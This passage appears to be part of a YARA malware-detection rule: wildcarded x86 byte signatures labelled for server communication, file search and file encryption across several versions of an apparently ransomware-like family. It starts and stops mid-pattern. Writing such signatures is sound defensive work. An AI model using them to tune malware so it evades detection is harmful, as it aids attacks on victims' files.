?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 - C0 75 32 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 55 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 55 8B 2D ?? ?? ?? ?? FF D5 - } - $server_communication_0_3_4a_1 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 C6 44 24 ?? - ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 85 C0 75 0D 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 55 56 57 6A ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ?? - ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 89 7C 24 ?? 33 F6 EB - 04 8B 7C 24 ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? - ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D - ?? ?? ?? ?? 56 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? - 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 - A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 - ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 - ?? 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 - } - $server_communication_0_3_4a_2 = { - 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 23 8B 14 B5 ?? - ?? ?? ?? 6A ?? 52 57 FF D3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B F8 6A ?? 8D 44 24 ?? 50 EB 3C 8B 0C B5 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 51 57 FF D3 8B 14 B5 ?? ?? ?? ?? 52 8B F8 8B 04 B5 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? - 6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 8B E8 - C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 85 C0 75 32 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 55 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 18 55 8B 2D ?? ?? ?? ?? FF D5 57 FF D5 83 C6 ?? 83 FE ?? 0F 8C CE - FD FF FF 8B 44 24 ?? 50 FF 15 - } - $server_communication_0_3_5a_1 = { - 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44 - 24 ?? 6A ?? 50 C6 44 24 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 8D 50 ?? 8B FF 8A 08 83 C0 ?? 84 C9 75 F7 2B C2 75 05 E8 ?? ?? ?? ?? 33 C0 50 50 50 50 - 68 ?? ?? ?? ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 33 DB 68 ?? ?? ?? ?? 8D 54 24 ?? 6A ?? - 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 - C4 ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 53 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? - ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? - ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? - 83 C4 ?? 8D 70 ?? 8B FF 8A 08 83 C0 ?? 84 C9 75 F7 8D 94 24 ?? ?? ?? ?? 2B C6 52 8D 7C 24 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? - 8D 8C 04 ?? ?? ?? ?? 8B F7 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 B8 ?? ?? ?? ?? E8 - } - $server_communication_0_3_5a_2 = { - 8B 14 9D ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 FB ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 20 6A ?? 52 50 FF 15 ?? ?? ?? - ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 8B F0 51 EB 39 68 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 8B 0C 9D ?? - ?? ?? ?? 8B 14 9D ?? ?? ?? ?? 51 6A ?? 52 8B F0 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 44 24 ?? 50 - 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 8B F8 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 32 8D 54 - 24 ?? 52 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? - ?? 83 C4 ?? 85 C0 75 18 57 8B 3D ?? ?? ?? ?? FF D7 56 FF D7 83 C3 ?? 83 FB ?? 0F 8C CD FD FF FF 8B 54 24 ?? 52 FF 15 - } - $server_communication_2_0_4e = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 83 3D ?? ?? - ?? ?? ?? 53 56 57 75 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? A1 ?? - ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? B8 ?? ?? ?? - ?? 8D 50 ?? 33 DB 8A 08 40 3A CB 75 ?? 2B C2 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D - 8C 24 ?? ?? ?? ?? 53 51 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 68 - ?? ?? ?? ?? FF 15 - } - $search_and_encrypt_2_0_4e_1 = { - 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56 - 57 33 C0 68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 33 D2 68 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 66 89 95 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? - ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? - ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ?? 83 FE ?? 0F 84 - } - $search_and_encrypt_2_0_4e_2 = { - 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ?? - ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? - 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 - ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? - ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 - } - $search_and_encrypt_2_0_4e_3 = { - 8B C3 83 C4 ?? 8D 50 ?? 90 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 F8 ?? 76 - ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D - ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? - ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 - ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 - } - $search_and_encrypt_2_0_4e_4 = { - 8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? - 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 - 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? - 52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 - C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D - 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 - } - $search_and_encrypt_2_0_4e_5 = { - 8D 85 ?? ?? ?? ?? 83 C4 ?? 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 8D 95 ?? - ?? ?? ?? D1 F8 52 8D 78 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 57 56 E8 ?? ?? ?? ?? 8B 3D - ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 FF D7 83 - C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 FF D7 83 C4 ?? 85 C0 75 ?? 8B C6 E8 ?? ?? ?? ?? - 83 F8 ?? 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? - 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 56 FF 15 - } - $server_communication_4_0_1 = { - 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 - } - $server_communication_4_0_2 = { - 8A 08 40 3A CB 75 ?? 2B ?? 50 8D ?? ?? ?? ?? ?? ?? [0-2] E8 ?? ?? ?? ?? 83 C4 04 8D - ?? 24 ?? ?? ?? ?? ?? (8B ??|8D ?? 24 ?? ?? ?? ??) ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? - C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 08 8D ?? 01 [0-7] 8A 08 40 3A CB - 75 ?? 2B ?? 8B C8 8D 51 ?? 83 E2 ?? B8 ?? ?? ?? ?? 2B C2 50 50 8D 7C 01 ?? 8D 84 0C - ?? ?? ?? ?? 50 E8 - } - $server_communication_4_0_3 = { - 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? ?? [1-2] - 8D ?? 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? [0-3] 51 E8 ?? ?? ?? ?? - 8B 15 ?? ?? ?? ?? 83 C4 ?? 8B ?? 8B 42 ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 BA ?? ?? ?? ?? - E8 ?? ?? ?? ?? 83 C4 ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 52 E8 ?? ?? ?? ?? 83 C4 - ?? 33 ?? 89 ?? 24 ?? 6A ?? 8D 44 24 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? B8 - ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 84 24 ?? - ?? ?? ?? 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? - ?? 53 52 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? 8B ?? 83 C4 ?? 8D 50 - } - $file_search_4_0_1 = { - 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 33 C0 68 - ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 68 ?? - ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 66 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? 6A ?? 51 E8 - } - $file_search_4_0_2 = { - 74 ?? FF 15 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 EB ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? - ?? ?? A1 ?? ?? ?? ?? 8B 48 ?? 51 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? - 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 8B F0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A - ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D0 83 FF ?? 0F 85 ?? ?? ?? ?? 83 3D ?? ?? ?? - ?? ?? 74 ?? 8B 0D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 51 ?? 8D 85 ?? ?? ?? ?? 50 52 - 8D 85 ?? ?? ?? ?? 50 EB ?? 8B 15 ?? ?? ?? ?? 8B 42 ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? - ?? ?? 50 8D 8D - } - $file_search_4_0_3 = { - E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? - 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? FF D0 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? - ?? ?? B8 ?? ?? ?? ?? 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 5F 33 - CD 33 C0 5E E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $file_search_4_1b_1 = { - E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 83 C4 ?? 68 ?? ?? - ?? ?? 8D 95 ?? ?? ?? ?? 52 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 - } - $file_search_4_1b_2 = { - E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 ?? ?? ?? ?? 83 FF ?? - 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 48 ?? 8D 95 ?? ?? ?? ?? 52 - 51 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B 3D ?? ?? - ?? ?? 8B 1D - } - $file_search_4_1b_3 = { - E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? - ?? 6A ?? 66 89 45 ?? 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 45 ?? ?? ?? ?? ?? - FF D3 85 C0 74 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 - } - $server_communication_4_1b_1 = { - 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 - } - $server_communication_4_1b_2 = { - E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 42 ?? 83 C4 ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 89 44 24 ?? 3B C3 75 ?? ?? ?? B8 ?? ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 68 ?? ?? ?? ?? 8D - ?? 24 ?? ?? ?? ?? 53 51 E8 ?? ?? ?? ?? 0F B6 ?? ?? ?? ?? ?? 0F B6 ?? ?? ?? ?? ?? 0F - B6 ?? ?? ?? ?? ?? 83 C4 0C - } - $server_communication_4_1b_3 = { - 8A 08 ?? ?? ?? 75 ?? 2B C6 50 57 8D ?? 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 - 8B CF 51 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8D 78 ?? 8A 08 40 - 3A CB 75 ?? 2B C7 8B C8 8D 51 ?? 83 E2 ?? B8 ?? ?? ?? ?? 2B C2 50 50 8D 7C 01 ?? 8D - 84 0C ?? ?? ?? ?? 50 E8 - } - $server_communication_4_1b_4 = { - FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 3B C3 76 ?? 8B 94 24 - ?? ?? ?? ?? 50 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B - 84 24 ?? ?? ?? ?? 3B C3 76 ?? 8B 8C 24 ?? ?? ?? ?? 50 51 8D 94 24 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 53 53 6A ?? 53 53 6A ?? 8D 84 24 ?? - ?? ?? ?? 50 51 FF 15 ?? ?? ?? ?? 8B F0 89 74 24 ?? 3B F3 0F 84 ?? ?? ?? ?? 6A ?? 8D - 54 24 ?? 52 6A ?? 56 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 48 - ?? 8B 40 ?? 53 68 ?? ?? ?? ?? 51 53 53 8D 94 24 ?? ?? ?? ?? 52 50 56 FF 15 - } - $server_communication_4_1b_5 = { - FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C - 24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 15 ?? ?? ?? ?? 88 9C 04 ?? ?? - ?? ?? 88 9C 04 ?? ?? ?? ?? 8B 42 ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 75 ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 4C 24 ?? 51 FF D6 8B 7C 24 ?? 47 89 7C - 24 ?? 83 FF ?? 0F 8C ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 6A ?? FF 15 - } - $file_search_4_2_1 = { - E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 68 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? - FF 70 ?? 8D 85 ?? ?? ?? ?? 50 FF D3 83 C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A - ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 - } - $file_search_4_2_2 = { - FF D3 8B 35 ?? ?? ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 6A ?? 8D 85 ?? - ?? ?? ?? 50 68 ?? ?? ?? ?? FF D6 6A ?? 8D 85 ?? ?? ?? ?? 50 FF D7 6A ?? 8D 45 ?? 6A - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - 66 89 45 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 51 - 6A ?? FF D3 - } - $server_communication_4_2_1 = { - FF 15 ?? ?? ?? ?? 8B F0 0F 57 C0 8D 84 24 ?? ?? ?? ?? 66 0F 7F 84 24 ?? ?? ?? ?? 50 - 8D 84 24 ?? ?? ?? ?? 8B D6 50 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - 8B CE E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 56 A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - 56 FF 15 - } - $server_communication_4_2_2 = { - FF D7 8B 0D ?? ?? ?? ?? 8B D0 8B 49 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? - ?? 8D 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? - 50 FF D7 - } - $server_communication_4_2_3 = { - 6A ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 6A ?? 56 FF 54 24 ?? 8B 0D ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? 8D 41 ?? 50 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 71 - ?? 56 FF 54 24 - } - $server_communication_4_2_4 = { - FF 54 24 ?? 8B 44 24 ?? 66 C7 84 04 ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? FF 70 ?? 8D 84 - 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 57 8B 7C 24 ?? FF D7 56 FF - D7 - } - $server_communication_4_2_5 = { - 57 8B 7C 24 ?? FF D7 56 FF D7 FF 74 24 ?? FF D7 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 6A ?? FF 15 - } - $server_communication_3_1 = { - 8A 08 40 3A CB 75 ?? 2B C7 50 8D 94 24 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 8D - 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? - ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8D ?? ?? EB - } - $server_communication_3_2 = { - 68 ?? ?? ?? ?? 88 9C 04 ?? ?? ?? ?? 51 88 9C 04 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 - ?? 85 C0 75 ?? 57 8B 3D ?? ?? ?? ?? FF D7 56 FF D7 8B 7C 24 ?? 83 C7 ?? 89 7C 24 ?? - 81 FF ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 39 1D ?? ?? ?? - ?? 75 ?? 8B 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 - } - $file_search_3_1 = { - 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? [0-1] 56 57 33 